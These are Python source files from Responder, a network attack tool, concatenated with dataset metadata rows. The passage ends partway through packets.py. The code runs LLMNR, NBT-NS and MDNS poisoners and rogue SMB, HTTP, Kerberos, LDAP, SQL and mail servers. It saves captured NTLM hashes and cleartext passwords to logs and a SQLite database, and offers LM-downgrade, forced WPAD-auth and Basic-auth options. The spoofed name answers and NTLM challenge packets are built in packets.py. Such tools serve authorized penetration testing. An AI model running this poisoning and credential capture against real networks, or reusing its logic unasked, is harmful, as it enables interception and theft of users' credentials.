parser.add_option('--lm', action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
parser.add_option('-v','--verbose', action="store_true", help="Increase verbosity.", dest="Verbose")
options, args = parser.parse_args()
if not os.geteuid() == 0:
print color("[!] Responder must be run as root.")
sys.exit(-1)
elif options.OURIP is None and IsOsX() is True:
print "\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n"
parser.print_help()
exit(-1)
settings.init()
settings.Config.populate(options)
StartupMessage()
settings.Config.ExpandIPRanges()
if settings.Config.AnalyzeMode:
print color('[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1)
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
def server_bind(self):
MADDR = "224.0.0.251"
self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MADDR) + settings.Config.IP_aton)
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
def server_bind(self):
MADDR = "224.0.0.252"
self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,socket.inet_aton(MADDR) + settings.Config.IP_aton)
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
ThreadingUDPServer.allow_reuse_address = 1
ThreadingTCPServer.allow_reuse_address = 1
ThreadingUDPMDNSServer.allow_reuse_address = 1
ThreadingUDPLLMNRServer.allow_reuse_address = 1
def serve_thread_udp_broadcast(host, port, handler):
try:
server = ThreadingUDPServer(('', port), handler)
server.serve_forever()
except:
print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
def serve_NBTNS_poisoner(host, port, handler):
serve_thread_udp_broadcast(host, port, handler)
def serve_MDNS_poisoner(host, port, handler):
try:
server = ThreadingUDPMDNSServer((host, port), handler)
server.serve_forever()
except:
print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
def serve_LLMNR_poisoner(host, port, handler):
try:
server = ThreadingUDPLLMNRServer((host, port), handler)
server.serve_forever()
except:
print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
def serve_thread_udp(host, port, handler):
try:
if OsInterfaceIsSupported():
server = ThreadingUDPServer((settings.Config.Bind_To, port), handler)
server.serve_forever()
else:
server = ThreadingUDPServer((host, port), handler)
server.serve_forever()
except:
print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
def serve_thread_tcp(host, port, handler):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, port), handler)
server.serve_forever()
else:
server = ThreadingTCPServer((host, port), handler)
server.serve_forever()
except:
print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
def serve_thread_SSL(host, port, handler):
try:
cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
key = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, port), handler)
server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True)
server.serve_forever()
else:
server = ThreadingTCPServer((host, port), handler)
server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True)
server.serve_forever()
except:
print color("[!] ", 1, 1) + "Error starting SSL server on port " + str(port) + ", check permissions or other servers running."
def main():
try:
threads = []
# Load (M)DNS, NBNS and LLMNR Poisoners
from poisoners.LLMNR import LLMNR
from poisoners.NBTNS import NBTNS
from poisoners.MDNS import MDNS
threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,)))
threads.append(Thread(target=serve_MDNS_poisoner, args=('', 5353, MDNS,)))
threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137, NBTNS,)))
# Load Browser Listener
from servers.Browser import Browser
threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 138, Browser,)))
if settings.Config.HTTP_On_Off:
from servers.HTTP import HTTP
threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTP,)))
if settings.Config.SSL_On_Off:
from servers.HTTP import HTTPS
threads.append(Thread(target=serve_thread_SSL, args=('', 443, HTTPS,)))
if settings.Config.WPAD_On_Off:
from servers.HTTP_Proxy import HTTP_Proxy
threads.append(Thread(target=serve_thread_tcp, args=('', 3141, HTTP_Proxy,)))
if settings.Config.SMB_On_Off:
if settings.Config.LM_On_Off:
from servers.SMB import SMB1LM
threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMB1LM,)))
threads.append(Thread(target=serve_thread_tcp, args=('', 139, SMB1LM,)))
else:
from servers.SMB import SMB1
threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMB1,)))
threads.append(Thread(target=serve_thread_tcp, args=('', 139, SMB1,)))
if settings.Config.Krb_On_Off:
from servers.Kerberos import KerbTCP, KerbUDP
threads.append(Thread(target=serve_thread_udp, args=('', 88, KerbUDP,)))
threads.append(Thread(target=serve_thread_tcp, args=('', 88, KerbTCP,)))
if settings.Config.SQL_On_Off:
from servers.MSSQL import MSSQL
threads.append(Thread(target=serve_thread_tcp, args=('', 1433, MSSQL,)))
if settings.Config.FTP_On_Off:
from servers.FTP import FTP
threads.append(Thread(target=serve_thread_tcp, args=('', 21, FTP,)))
if settings.Config.POP_On_Off:
from servers.POP3 import POP3
threads.append(Thread(target=serve_thread_tcp, args=('', 110, POP3,)))
if settings.Config.LDAP_On_Off:
from servers.LDAP import LDAP
threads.append(Thread(target=serve_thread_tcp, args=('', 389, LDAP,)))
if settings.Config.SMTP_On_Off:
from servers.SMTP import ESMTP
threads.append(Thread(target=serve_thread_tcp, args=('', 25, ESMTP,)))
threads.append(Thread(target=serve_thread_tcp, args=('', 587, ESMTP,)))
if settings.Config.IMAP_On_Off:
from servers.IMAP import IMAP
threads.append(Thread(target=serve_thread_tcp, args=('', 143, IMAP,)))
if settings.Config.DNS_On_Off:
from servers.DNS import DNS, DNSTCP
threads.append(Thread(target=serve_thread_udp, args=('', 53, DNS,)))
threads.append(Thread(target=serve_thread_tcp, args=('', 53, DNSTCP,)))
for thread in threads:
thread.setDaemon(True)
thread.start()
print color('[+]', 2, 1) + " Listening for events..."
while True:
time.sleep(1)
except KeyboardInterrupt:
sys.exit("\r%s Exiting..." % color('[+]', 2, 1))
if __name__ == '__main__':
main()
| 11,158 | Python | .py | 215 | 48.874419 | 240 | 0.731607 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,387 | odict.py | SpiderLabs_Responder/odict.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from UserDict import DictMixin
class OrderedDict(dict, DictMixin):
def __init__(self, *args, **kwds):
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__end
except AttributeError:
self.clear()
self.update(*args, **kwds)
def clear(self):
self.__end = end = []
end += [None, end, end]
self.__map = {}
dict.clear(self)
def __setitem__(self, key, value):
if key not in self:
end = self.__end
curr = end[1]
curr[2] = end[1] = self.__map[key] = [key, curr, end]
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
key, prev, next = self.__map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.__end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.__end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def popitem(self, last=True):
if not self:
raise KeyError('dictionary is empty')
if last:
key = reversed(self).next()
else:
key = iter(self).next()
value = self.pop(key)
return key, value
def __reduce__(self):
items = [[k, self[k]] for k in self]
tmp = self.__map, self.__end
del self.__map, self.__end
inst_dict = vars(self).copy()
self.__map, self.__end = tmp
if inst_dict:
return self.__class__, (items,), inst_dict
return self.__class__, (items,)
def keys(self):
return list(self)
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
iterkeys = DictMixin.iterkeys
itervalues = DictMixin.itervalues
iteritems = DictMixin.iteritems
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
def copy(self):
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
if isinstance(other, OrderedDict):
return len(self)==len(other) and \
min(p==q for p, q in zip(self.items(), other.items()))
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
| 3,516 | Python | .py | 101 | 27.207921 | 79 | 0.580171 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,388 | utils.py | SpiderLabs_Responder/utils.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import re
import logging
import socket
import time
import settings
try:
import sqlite3
except:
print "[!] Please install python-sqlite3 extension."
sys.exit(0)
def color(txt, code = 1, modifier = 0):
if txt.startswith('[*]'):
settings.Config.PoisonersLogger.warning(txt)
elif 'Analyze' in txt:
settings.Config.AnalyzeLogger.warning(txt)
if os.name == 'nt': # No colors for windows...
return txt
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def text(txt):
logging.info(txt)
if os.name == 'nt':
return txt
return '\r' + re.sub(r'\[([^]]*)\]', "\033[1;34m[\\1]\033[0m", txt)
def IsOnTheSameSubnet(ip, net):
net += '/24'
ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16)
netstr, bits = net.split('/')
netaddr = int(''.join([ '%02x' % int(x) for x in netstr.split('.') ]), 16)
mask = (0xffffffff << (32 - int(bits))) & 0xffffffff
return (ipaddr & mask) == (netaddr & mask)
def RespondToThisIP(ClientIp):
if ClientIp.startswith('127.0.0.'):
return False
elif settings.Config.AutoIgnore and ClientIp in settings.Config.AutoIgnoreList:
print color('[*]', 3, 1), 'Received request from auto-ignored client %s, not answering.' % ClientIp
return False
elif settings.Config.RespondTo and ClientIp not in settings.Config.RespondTo:
return False
elif ClientIp in settings.Config.RespondTo or settings.Config.RespondTo == []:
if ClientIp not in settings.Config.DontRespondTo:
return True
return False
def RespondToThisName(Name):
if settings.Config.RespondToName and Name.upper() not in settings.Config.RespondToName:
return False
elif Name.upper() in settings.Config.RespondToName or settings.Config.RespondToName == []:
if Name.upper() not in settings.Config.DontRespondToName:
return True
return False
def RespondToThisHost(ClientIp, Name):
return RespondToThisIP(ClientIp) and RespondToThisName(Name)
def OsInterfaceIsSupported():
if settings.Config.Interface != "Not set":
return not IsOsX()
return False
def IsOsX():
return sys.platform == "darwin"
def FindLocalIP(Iface, OURIP):
if Iface == 'ALL':
return '0.0.0.0'
try:
if IsOsX():
return OURIP
elif OURIP == None:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, 25, Iface+'\0')
s.connect(("127.0.0.1",9))#RFC 863
ret = s.getsockname()[0]
s.close()
return ret
return OURIP
except socket.error:
print color("[!] Error: %s: Interface not found" % Iface, 1)
sys.exit(-1)
# Function used to write captured hashs to a file.
def WriteData(outfile, data, user):
logging.info("[*] Captured Hash: %s" % data)
if not os.path.isfile(outfile):
with open(outfile,"w") as outf:
outf.write(data + '\n')
return
with open(outfile,"r") as filestr:
if re.search(user.encode('hex'), filestr.read().encode('hex')):
return False
elif re.search(re.escape("$"), user):
return False
with open(outfile,"a") as outf2:
outf2.write(data + '\n')
def SaveToDb(result):
# Creating the DB if it doesn't exist
if not os.path.exists(settings.Config.DatabaseFile):
cursor = sqlite3.connect(settings.Config.DatabaseFile)
cursor.execute('CREATE TABLE responder (timestamp varchar(32), module varchar(16), type varchar(16), client varchar(32), hostname varchar(32), user varchar(32), cleartext varchar(128), hash varchar(512), fullhash varchar(512))')
cursor.commit()
cursor.close()
for k in [ 'module', 'type', 'client', 'hostname', 'user', 'cleartext', 'hash', 'fullhash' ]:
if not k in result:
result[k] = ''
if len(result['user']) < 2:
return
if len(result['cleartext']):
fname = '%s-%s-ClearText-%s.txt' % (result['module'], result['type'], result['client'])
else:
fname = '%s-%s-%s.txt' % (result['module'], result['type'], result['client'])
logfile = os.path.join(settings.Config.ResponderPATH, 'logs', fname)
cursor = sqlite3.connect(settings.Config.DatabaseFile)
cursor.text_factory = sqlite3.Binary # We add a text factory to support different charsets
res = cursor.execute("SELECT COUNT(*) AS count FROM responder WHERE module=? AND type=? AND client=? AND LOWER(user)=LOWER(?)", (result['module'], result['type'], result['client'], result['user']))
(count,) = res.fetchone()
if not count:
with open(logfile,"a") as outf:
if len(result['cleartext']): # If we obtained cleartext credentials, write them to file
outf.write('%s:%s\n' % (result['user'].encode('utf8', 'replace'), result['cleartext'].encode('utf8', 'replace')))
else: # Otherwise, write JtR-style hash string to file
outf.write(result['fullhash'].encode('utf8', 'replace') + '\n')
cursor.execute("INSERT INTO responder VALUES(datetime('now'), ?, ?, ?, ?, ?, ?, ?, ?)", (result['module'], result['type'], result['client'], result['hostname'], result['user'], result['cleartext'], result['hash'], result['fullhash']))
cursor.commit()
if not count or settings.Config.Verbose: # Print output
if len(result['client']):
print text("[%s] %s Client : %s" % (result['module'], result['type'], color(result['client'], 3)))
if len(result['hostname']):
print text("[%s] %s Hostname : %s" % (result['module'], result['type'], color(result['hostname'], 3)))
if len(result['user']):
print text("[%s] %s Username : %s" % (result['module'], result['type'], color(result['user'], 3)))
# Bu order of priority, print cleartext, fullhash, or hash
if len(result['cleartext']):
print text("[%s] %s Password : %s" % (result['module'], result['type'], color(result['cleartext'], 3)))
elif len(result['fullhash']):
print text("[%s] %s Hash : %s" % (result['module'], result['type'], color(result['fullhash'], 3)))
elif len(result['hash']):
print text("[%s] %s Hash : %s" % (result['module'], result['type'], color(result['hash'], 3)))
# Appending auto-ignore list if required
# Except if this is a machine account's hash
if settings.Config.AutoIgnore and not result['user'].endswith('$'):
settings.Config.AutoIgnoreList.append(result['client'])
print color('[*] Adding client %s to auto-ignore list' % result['client'], 4, 1)
else:
print color('[*]', 3, 1), 'Skipping previously captured hash for %s' % result['user']
cursor.execute("UPDATE responder SET timestamp=datetime('now') WHERE user=? AND client=?", (result['user'], result['client']))
cursor.commit()
cursor.close()
def Parse_IPV6_Addr(data):
if data[len(data)-4:len(data)][1] =="\x1c":
return False
elif data[len(data)-4:len(data)] == "\x00\x01\x00\x01":
return True
elif data[len(data)-4:len(data)] == "\x00\xff\x00\x01":
return True
return False
def Decode_Name(nbname): #From http://code.google.com/p/dpkt/ with author's permission.
try:
from string import printable
if len(nbname) != 32:
return nbname
l = []
for i in range(0, 32, 2):
l.append(chr(((ord(nbname[i]) - 0x41) << 4) | ((ord(nbname[i+1]) - 0x41) & 0xf)))
return filter(lambda x: x in printable, ''.join(l).split('\x00', 1)[0].replace(' ', ''))
except:
return "Illegal NetBIOS name"
def NBT_NS_Role(data):
return {
"\x41\x41\x00":"Workstation/Redirector",
"\x42\x4c\x00":"Domain Master Browser",
"\x42\x4d\x00":"Domain Controller",
"\x42\x4e\x00":"Local Master Browser",
"\x42\x4f\x00":"Browser Election",
"\x43\x41\x00":"File Server",
"\x41\x42\x00":"Browser",
}.get(data, 'Service not known')
def banner():
banner = "\n".join([
' __',
' .----.-----.-----.-----.-----.-----.--| |.-----.----.',
' | _| -__|__ --| _ | _ | | _ || -__| _|',
' |__| |_____|_____| __|_____|__|__|_____||_____|__|',
' |__|'
])
print banner
print "\n \033[1;33mNBT-NS, LLMNR & MDNS %s\033[0m" % settings.__version__
print ""
print " Author: Laurent Gaffie (laurent.gaffie@gmail.com)"
print " To kill this script hit CRTL-C"
print ""
def StartupMessage():
enabled = color('[ON]', 2, 1)
disabled = color('[OFF]', 1, 1)
print ""
print color("[+] ", 2, 1) + "Poisoners:"
print ' %-27s' % "LLMNR" + enabled
print ' %-27s' % "NBT-NS" + enabled
print ' %-27s' % "DNS/MDNS" + enabled
print ""
print color("[+] ", 2, 1) + "Servers:"
print ' %-27s' % "HTTP server" + (enabled if settings.Config.HTTP_On_Off else disabled)
print ' %-27s' % "HTTPS server" + (enabled if settings.Config.SSL_On_Off else disabled)
print ' %-27s' % "WPAD proxy" + (enabled if settings.Config.WPAD_On_Off else disabled)
print ' %-27s' % "SMB server" + (enabled if settings.Config.SMB_On_Off else disabled)
print ' %-27s' % "Kerberos server" + (enabled if settings.Config.Krb_On_Off else disabled)
print ' %-27s' % "SQL server" + (enabled if settings.Config.SQL_On_Off else disabled)
print ' %-27s' % "FTP server" + (enabled if settings.Config.FTP_On_Off else disabled)
print ' %-27s' % "IMAP server" + (enabled if settings.Config.IMAP_On_Off else disabled)
print ' %-27s' % "POP3 server" + (enabled if settings.Config.POP_On_Off else disabled)
print ' %-27s' % "SMTP server" + (enabled if settings.Config.SMTP_On_Off else disabled)
print ' %-27s' % "DNS server" + (enabled if settings.Config.DNS_On_Off else disabled)
print ' %-27s' % "LDAP server" + (enabled if settings.Config.LDAP_On_Off else disabled)
print ""
print color("[+] ", 2, 1) + "HTTP Options:"
print ' %-27s' % "Always serving EXE" + (enabled if settings.Config.Serve_Always else disabled)
print ' %-27s' % "Serving EXE" + (enabled if settings.Config.Serve_Exe else disabled)
print ' %-27s' % "Serving HTML" + (enabled if settings.Config.Serve_Html else disabled)
print ' %-27s' % "Upstream Proxy" + (enabled if settings.Config.Upstream_Proxy else disabled)
#print ' %-27s' % "WPAD script" + settings.Config.WPAD_Script
print ""
print color("[+] ", 2, 1) + "Poisoning Options:"
print ' %-27s' % "Analyze Mode" + (enabled if settings.Config.AnalyzeMode else disabled)
print ' %-27s' % "Force WPAD auth" + (enabled if settings.Config.Force_WPAD_Auth else disabled)
print ' %-27s' % "Force Basic Auth" + (enabled if settings.Config.Basic else disabled)
print ' %-27s' % "Force LM downgrade" + (enabled if settings.Config.LM_On_Off == True else disabled)
print ' %-27s' % "Fingerprint hosts" + (enabled if settings.Config.Finger_On_Off == True else disabled)
print ""
print color("[+] ", 2, 1) + "Generic Options:"
print ' %-27s' % "Responder NIC" + color('[%s]' % settings.Config.Interface, 5, 1)
print ' %-27s' % "Responder IP" + color('[%s]' % settings.Config.Bind_To, 5, 1)
print ' %-27s' % "Challenge set" + color('[%s]' % settings.Config.NumChal, 5, 1)
if settings.Config.Upstream_Proxy:
print ' %-27s' % "Upstream Proxy" + color('[%s]' % settings.Config.Upstream_Proxy, 5, 1)
if len(settings.Config.RespondTo):
print ' %-27s' % "Respond To" + color(str(settings.Config.RespondTo), 5, 1)
if len(settings.Config.RespondToName):
print ' %-27s' % "Respond To Names" + color(str(settings.Config.RespondToName), 5, 1)
if len(settings.Config.DontRespondTo):
print ' %-27s' % "Don't Respond To" + color(str(settings.Config.DontRespondTo), 5, 1)
if len(settings.Config.DontRespondToName):
print ' %-27s' % "Don't Respond To Names" + color(str(settings.Config.DontRespondToName), 5, 1)
print "\n\n"
# Useful for debugging
def hexdump(src, l=0x16):
res = []
sep = '.'
src = str(src)
for i in range(0, len(src), l):
s = src[i:i+l]
hexa = ''
for h in range(0,len(s)):
if h == l/2:
hexa += ' '
h = s[h]
if not isinstance(h, int):
h = ord(h)
h = hex(h).replace('0x','')
if len(h) == 1:
h = '0'+h
hexa += h + ' '
hexa = hexa.strip(' ')
text = ''
for c in s:
if not isinstance(c, int):
c = ord(c)
if 0x20 <= c < 0x7F:
text += chr(c)
else:
text += sep
res.append(('%08X: %-'+str(l*(2+1)+1)+'s |%s|') % (i, hexa, text))
return '\n'.join(res) | 12,730 | Python | .py | 283 | 42.300353 | 236 | 0.659291 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,389 | packets.py | SpiderLabs_Responder/packets.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import struct
import settings
from base64 import b64decode, b64encode
from odict import OrderedDict
# Packet class handling all packet generation (see odict.py).
class Packet():
fields = OrderedDict([
("data", ""),
])
def __init__(self, **kw):
self.fields = OrderedDict(self.__class__.fields)
for k,v in kw.items():
if callable(v):
self.fields[k] = v(self.fields[k])
else:
self.fields[k] = v
def __str__(self):
return "".join(map(str, self.fields.values()))
# NBT Answer Packet
class NBT_Ans(Packet):
fields = OrderedDict([
("Tid", ""),
("Flags", "\x85\x00"),
("Question", "\x00\x00"),
("AnswerRRS", "\x00\x01"),
("AuthorityRRS", "\x00\x00"),
("AdditionalRRS", "\x00\x00"),
("NbtName", ""),
("Type", "\x00\x20"),
("Classy", "\x00\x01"),
("TTL", "\x00\x00\x00\xa5"),
("Len", "\x00\x06"),
("Flags1", "\x00\x00"),
("IP", "\x00\x00\x00\x00"),
])
def calculate(self,data):
self.fields["Tid"] = data[0:2]
self.fields["NbtName"] = data[12:46]
self.fields["IP"] = settings.Config.IP_aton
# DNS Answer Packet
class DNS_Ans(Packet):
fields = OrderedDict([
("Tid", ""),
("Flags", "\x80\x10"),
("Question", "\x00\x01"),
("AnswerRRS", "\x00\x01"),
("AuthorityRRS", "\x00\x00"),
("AdditionalRRS", "\x00\x00"),
("QuestionName", ""),
("QuestionNameNull", "\x00"),
("Type", "\x00\x01"),
("Class", "\x00\x01"),
("AnswerPointer", "\xc0\x0c"),
("Type1", "\x00\x01"),
("Class1", "\x00\x01"),
("TTL", "\x00\x00\x00\x1e"), #30 secs, don't mess with their cache for too long..
("IPLen", "\x00\x04"),
("IP", "\x00\x00\x00\x00"),
])
def calculate(self,data):
self.fields["Tid"] = data[0:2]
self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1])
self.fields["IP"] = settings.Config.IP_aton
self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"]))
# LLMNR Answer Packet
class LLMNR_Ans(Packet):
fields = OrderedDict([
("Tid", ""),
("Flags", "\x80\x00"),
("Question", "\x00\x01"),
("AnswerRRS", "\x00\x01"),
("AuthorityRRS", "\x00\x00"),
("AdditionalRRS", "\x00\x00"),
("QuestionNameLen", "\x09"),
("QuestionName", ""),
("QuestionNameNull", "\x00"),
("Type", "\x00\x01"),
("Class", "\x00\x01"),
("AnswerNameLen", "\x09"),
("AnswerName", ""),
("AnswerNameNull", "\x00"),
("Type1", "\x00\x01"),
("Class1", "\x00\x01"),
("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec.
("IPLen", "\x00\x04"),
("IP", "\x00\x00\x00\x00"),
])
def calculate(self):
self.fields["IP"] = settings.Config.IP_aton
self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"]))
self.fields["AnswerNameLen"] = struct.pack(">h",len(self.fields["AnswerName"]))[1]
self.fields["QuestionNameLen"] = struct.pack(">h",len(self.fields["QuestionName"]))[1]
# MDNS Answer Packet
class MDNS_Ans(Packet):
fields = OrderedDict([
("Tid", "\x00\x00"),
("Flags", "\x84\x00"),
("Question", "\x00\x00"),
("AnswerRRS", "\x00\x01"),
("AuthorityRRS", "\x00\x00"),
("AdditionalRRS", "\x00\x00"),
("AnswerName", ""),
("AnswerNameNull", "\x00"),
("Type", "\x00\x01"),
("Class", "\x00\x01"),
("TTL", "\x00\x00\x00\x78"),##Poison for 2mn.
("IPLen", "\x00\x04"),
("IP", "\x00\x00\x00\x00"),
])
def calculate(self):
self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"]))
##### HTTP Packets #####
class NTLM_Challenge(Packet):
fields = OrderedDict([
("Signature", "NTLMSSP"),
("SignatureNull", "\x00"),
("MessageType", "\x02\x00\x00\x00"),
("TargetNameLen", "\x06\x00"),
("TargetNameMaxLen", "\x06\x00"),
("TargetNameOffset", "\x38\x00\x00\x00"),
("NegoFlags", "\x05\x02\x89\xa2"),
("ServerChallenge", ""),
("Reserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("TargetInfoLen", "\x7e\x00"),
("TargetInfoMaxLen", "\x7e\x00"),
("TargetInfoOffset", "\x3e\x00\x00\x00"),
("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"),
("TargetNameStr", "SMB"),
("Av1", "\x02\x00"),#nbt name
("Av1Len", "\x06\x00"),
("Av1Str", "SMB"),
("Av2", "\x01\x00"),#Server name
("Av2Len", "\x14\x00"),
("Av2Str", "SMB-TOOLKIT"),
("Av3", "\x04\x00"),#Full Domain name
("Av3Len", "\x12\x00"),
("Av3Str", "smb.local"),
("Av4", "\x03\x00"),#Full machine domain name
("Av4Len", "\x28\x00"),
("Av4Str", "server2003.smb.local"),
("Av5", "\x05\x00"),#Domain Forest Name
("Av5Len", "\x12\x00"),
("Av5Str", "smb.local"),
("Av6", "\x00\x00"),#AvPairs Terminator
("Av6Len", "\x00\x00"),
])
def calculate(self):
# First convert to unicode
self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode('utf-16le')
self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le')
self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le')
self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le')
self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le')
self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le')
# Then calculate
CalculateNameOffset = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])
CalculateAvPairsOffset = CalculateNameOffset+str(self.fields["TargetNameStr"])
CalculateAvPairsLen = str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
# Target Name Offsets
self.fields["TargetNameOffset"] = struct.pack("<i", len(CalculateNameOffset))
self.fields["TargetNameLen"] = struct.pack("<i", len(self.fields["TargetNameStr"]))[:2]
self.fields["TargetNameMaxLen"] = struct.pack("<i", len(self.fields["TargetNameStr"]))[:2]
# AvPairs Offsets
self.fields["TargetInfoOffset"] = struct.pack("<i", len(CalculateAvPairsOffset))
self.fields["TargetInfoLen"] = struct.pack("<i", len(CalculateAvPairsLen))[:2]
self.fields["TargetInfoMaxLen"] = struct.pack("<i", len(CalculateAvPairsLen))[:2]
# AvPairs StrLen
self.fields["Av1Len"] = struct.pack("<i", len(str(self.fields["Av1Str"])))[:2]
self.fields["Av2Len"] = struct.pack("<i", len(str(self.fields["Av2Str"])))[:2]
self.fields["Av3Len"] = struct.pack("<i", len(str(self.fields["Av3Str"])))[:2]
self.fields["Av4Len"] = struct.pack("<i", len(str(self.fields["Av4Str"])))[:2]
